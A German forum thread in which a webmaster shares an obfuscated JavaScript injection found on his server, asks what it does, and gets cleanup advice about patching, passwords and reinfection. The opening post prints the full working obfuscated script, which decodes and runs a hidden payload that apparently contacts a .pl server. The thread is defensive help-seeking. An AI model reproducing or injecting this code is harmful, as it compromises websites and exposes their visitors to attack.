Hi, ich habe heute auf meinem Webserver folgenden Schadstoffcode entdeckt. Leider ist der Verschlüsselt. Kennt den jemand zbw. kann mir einer Sagen was er genau macht?

HTML-Code:

<!--adea77--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          if(021===0x11)v="va"+"l";try{faweb--}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w["e".concat(v)];}}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,111,103,107,100,119,32,60,37,103,110,109,103,107,99,95,114,98,52,51,50,102,38,57,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,101,114,112,45,103,122,97,95,107,110,107,111,113,108,105,98,120,97,45,102,111,108,99,46,111,106,47,96,98,109,104,108,105,114,114,114,96,114,111,113,45,99,110,107,112,110,108,101,109,114,115,46,97,111,108,93,99,110,108,102,104,101,47,113,99,101,107,44,112,103,110,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,97,111,103,107,100,119,61,60,37,39,40,30,123,9,30,32,117,95,114,31,112,101,114,110,111,109,113,101,31,59,32,38,99,114,113,109,114,38,57,10,31,123,10,31,103,102,39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,40,11,10,31,121,13,9,30,100,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,59,92,38,95,100,111,106,92,38,60,60,46,98,105,117,60,39,40,57,13,9,30,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,119,73,99,38,39,96,98,112,107,37,41,45,95,112,111,99,110,99,65,104,104,106,100,39,95,41,58,11,10,31,123,13,9,123,41,39,39,59);}w=f;s=[];r=String;for(i=0;-i+535!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCh"+"arC"+((020===0x10)?"ode":"")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+"");}</script><!--/adea77-->

Das was du hier zeigst ist lediglich der HTML Tag für Javascript,poste lieber den Code der zwischen den <Script> und </Script> steht.

das teil verbindet zumindest schon mal auf nen ftp server, danach gehts nicht weiter, guck gleich noch mal

a server ist leer, aber nicht mal passwort geschützt :d

Meinst den Verver von der Schadstoffware?

jo, das script verbindet zu einem ftp server, der als endung .pl hatt
hab aber keine whois info abfrage gemacht, weis also nicht, ob er auch in polen steht.

Könntest du mir den Entschlüsselten Code mal an meine PN Box schicken? Würde gerne mal Sehen, was da reingeschrieben wurde.

da mal hochladen
jsunpack - a generic JavaScript unpacker

Zitat:

Zitat von Ryko

Das was du hier zeigst ist lediglich der HTML Tag für Javascript,poste lieber den Code der zwischen den <Script> und </Script> steht.

Ist doch vorhanden. Nach rechts gescrollt?

@markusg Danke für deine Infos und den Link!

kein prob.
du solltest sicherheitslücken auf dem server schließen, zb wenn du wordpress nutzt, unnötige plugins rausschmeißen, etc, wenn man genaueres wüsste, könnte man da evtl. noch mehr sagen was zu tun ist.

Dieses Ding verbreitet sich sehr schnell. Habe den Code jetzt schon auf 2 verschiedenen Seiten auf meinem Server entdeckt. Und wenn man googlet findet man haufenweise betroffene Seiten.
Ich weiß aber nicht wie ich es weg kriege. Einfaches löschen hilft nix. Auch Umzug, Umbenennen der Variablen oder bearbeiten der Upload Variablen hat nichts gebracht. Der Code war noch einiger Zeit wieder da.

Der Link zum entschlüsseln hat mir übrigens nicht viel Erkenntnis gebracht. Hat denn schon jemand weitere Infos, wo das Ding her kommt und vor allem wie es auf die Seiten kommt?

schließe alle sicherheitslücken in genutzten cms, evtl. sicherheitslücken des servers schließen, passwörter endern, evtl. pc hier mal im bereich plagegeister auf malware untersuchen lassen.

Zitat:

Zitat von jerryme76

Einfaches löschen hilft nix.

Doch, denn wenn es nicht dein wirklich persönlicher Server ist (egal ob bei dir zuhause oder in einem Rechenzentrum). Ansonsten sind z.B. veraltetes PHP, CMS-Software (falls eingesetzt), veraltete Webserversoftware und vorallem und subjektiver Erfahrung nach schlecht/unsichere FTP-Accounts die Ursache für eine Reinfektion. In soweit hast du recht, einfaches löschen hilft nicht, man muss sich schon bewegen.

Glaub mir... ich habe eine Menge unternommen. Ich habe wie gesagt, sämtliche PHP Dateien durchsucht, ich habe Upload Variablen umbenannt, ich habe alle Passwörter geändert. CMS nutze ich nicht. Ich bin mit der Seite an einen anderen Ort umgezogen.
Jetzt habe ich das Teil woanders gefunden. Ich frage am Anfang der Seite den LogStatus ab, und wenn es noch keinen Login gab, wird die Default Seite gezeigt. Und mitten in dieser Else Anweisung stand dann der Code. Also an einer Stelle, wo nicht mal etwas per POST oder GET gesendet wird, wo man also nicht mal ein XSS einschleusen könnte.
Alsa letzte Instanz bin ich jetzt auf einen anderen Server umgezogen und logge sämtliche Klicks (,also alles was passiert,) auf der Seite mit.
Mal gucken ob es nochmal wieder kommt.
Aber trotzdem würde mich schon interessieren, wo das Ding herkommt und was der Code macht. Der o.a. Link zum entschlüsseln hat nicht viel erklärt.